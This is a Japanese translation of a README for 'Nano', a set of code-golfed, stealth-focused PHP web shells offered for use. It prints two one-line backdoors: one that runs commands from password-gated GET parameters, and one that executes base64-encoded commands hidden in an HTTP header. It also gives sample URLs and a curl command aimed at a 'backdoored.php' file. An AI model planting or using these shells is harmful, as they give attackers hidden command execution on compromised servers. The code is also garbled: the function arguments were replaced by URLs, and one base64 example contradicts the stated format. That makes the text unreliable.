
Nanoは、ステルス性を重視してコードゴルフされたPHPウェブシェルのファミリーです。
Nanoは、コードゴルフによって極めてステルス性が高く、効率的なPHPウェブシェルのファミリーです。
もしかしたら注目しておいてください。今後もここにウェブシェルを追加していく予定です。
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/master/%24GET_%5Bc%5D);
http://example.com/nano.php?f=function&c=command&p=password
f は関数用
c はコマンド用
p はパスワード用
例えば、以下のコードは ls コマンドを実行します:
http://example.com/nano.php?f=system&c=ls&p=password
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/master/%24x%5B1%5D);
これは少し複雑です。
system(ls) を実行したい場合、system~ls と書いてからbase64エンコードします。つまり c3lzdGVtKGxzKQ== です。
その先頭に任意の1文字を追加します。例えば 'x' を追加すると xc3lzdGVtKGxzKQ== になります。
次にターミナルを開いて、以下のコマンドを入力します。
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
手間がかかりすぎる?代わりにハンドラを使用できます。

これは私の最初のPHP作品なので、私がやったことをより良い方法で実現できる方法があれば、教えてください。またはプルリクエストを開いてください。
nanoプロジェクトはMITライセンスの下でライセンスされており、基本的には再配布や変更を行う場合、私へのクレジット表示が必要です。